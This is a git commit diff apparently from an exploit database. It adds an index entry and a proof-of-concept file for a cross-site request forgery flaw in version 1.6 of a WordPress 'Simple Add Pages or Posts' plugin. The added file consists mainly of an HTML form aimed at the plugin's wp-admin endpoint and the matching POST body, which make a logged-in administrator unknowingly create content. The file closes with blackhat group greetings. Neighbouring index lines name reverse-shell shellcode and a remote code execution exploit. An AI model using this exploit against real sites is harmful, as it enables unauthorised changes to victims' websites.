DB: 2016-02-14

1 new exploits
2016-02-14 05:02:40 +00:00 · 2016-02-14 05:02:40 +00:00 · a9d446b65b
commit a9d446b65b
parent 0d39670c20
2 changed files with 43 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -35627,6 +35627,7 @@ id,file,description,date,author,platform,type,port
 39381,platforms/osx/dos/39381.c,"OS X - IOHDIXControllerUserClient::convertClientBuffer Integer Overflow",2016-01-28,"Google Security Research",osx,dos,0
 39382,platforms/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,multiple,webapps,0
 39383,platforms/lin_x86-64/shellcode/39383.c,"x86_64 Linux shell_reverse_tcp with Password - Polymorphic Version",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
+39384,platforms/php/webapps/39384.txt,"WordPress Simple Add Pages or Posts Plugin 1.6 - CSRF Vulnerability",2016-01-29,ALIREZA_PROMIS,php,webapps,0
 39385,platforms/php/webapps/39385.txt,"ProjectSend r582 - Multiple Vulnerabilities",2016-01-29,"Filippo Cavallarin",php,webapps,80
 39387,platforms/php/webapps/39387.py,"iScripts EasyCreate 3.0 - Remote Code Execution Exploit",2016-02-01,"Bikramaditya Guha",php,webapps,80
 39388,platforms/lin_x86-64/shellcode/39388.c,"x86_64 Linux shell_reverse_tcp with Password - Polymorphic Version v2",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
--- a/platforms/php/webapps/39384.txt
+++ b/platforms/php/webapps/39384.txt
@ -0,0 +1,42 @@
+########################################################################
+# Exploit Title: Wordpress simple add pages or posts CSRF Vulnerability
+# Date: 2016/29/01
+# Exploit Author: ALIREZA_PROMIS
+# Vendor Homepage: https://wordpress.org/plugins/simple-add-pages-or-posts/
+# Software Link: https://downloads.wordpress.org/plugin/simple-add-pages-or-posts.1.6.zip
+# Version: 1.6
+# Tested on: ubuntu / FireFox
+########################################################################
+
+[Exploitation]
+https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
+
+[HTML CODE ]
+<form id="form1" name="form1" method="post" action="http://site.com/wp-admin/plugins.php?page=simple-add-pages-or-posts%2Fsimple_add_pages_or_posts.php"
+<select name="postorpage">
+<option value="page">Page</option>
+<option value="post">Post</option>
+</select>
+<td colspan="2"><select name='post_parent' id='post_parent'>
+<option value="">No, do not use parent</option>
+<option class="level-0" value="2">Sample Page</option>
+</select>
+<tr class="alternate iedit">
+<textarea name="titles" rows="1" cols="30">&lt;/textarea&gt;
+<tr class="iedit">
+<td colspan="2"><select name="author_id">
+<option value="1">admin</option></select>
+<input type="submit" name="submitbutton" value="Add" class="button-primary"></form>
+
+
+
+and live POST request :
+postorpage=page&post_parent=2&titles=TEST_CSRF&author_id=1&submitbutton=Add
+
+
+########################################################################
+# Friends : ali ahmady , Mr.Moein , sheytan azzam , Mr.PERSIA , H3llBoy.Blackhat , Amir , Jok3r
+# Sajjad Sotoudeh , security  , Kamran Helish , Dr.RooT , Milad Inj3ctor , Mr.Turk
+#
+# [+] fb.com/alirezapomis.blackhat
+########################################################################